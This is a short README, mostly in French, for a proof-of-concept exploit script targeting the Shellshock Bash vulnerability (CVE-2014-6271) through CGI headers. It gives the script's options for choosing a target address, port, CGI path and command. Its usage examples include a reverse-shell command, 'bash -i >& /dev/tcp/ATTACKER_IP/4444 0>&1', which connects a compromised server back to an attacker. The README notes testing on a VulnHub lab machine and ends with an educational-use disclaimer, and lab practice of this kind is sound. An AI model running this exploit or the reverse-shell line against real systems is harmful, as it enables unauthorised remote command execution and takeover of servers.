
Exploit CVE-2014-6271 | par infrar3d
exploité par infrar3d
Ce dépôt contient une preuve de concept d'exploit pour CVE-2014-6271 (Shellshock).
Shellshock est une vulnérabilité critique dans GNU Bash où des variables d'environnement spécialement conçues permettent l'exécution arbitraire de commandes.
Lorsqu'un serveur web transmet des en-têtes HTTP à des scripts CGI qui invoquent Bash, un attaquant peut injecter des commandes via ces en-têtes.
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help print this message and exit
-a | --address target address (default is "localhost")
-p | --port target port (default is 80)
-f | --file target file (default is "/cgi-bin/shell.sh")
-c | --command command to execute on the target machine (default is "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(testé sur la machine VulnHub "Hacksudo - Thor")
Ce logiciel et ce code de preuve de concept sont fournis uniquement à des fins éducatives et de recherche.
Vous êtes responsable du respect de toutes les lois applicables. Utilisez de manière éthique et responsable.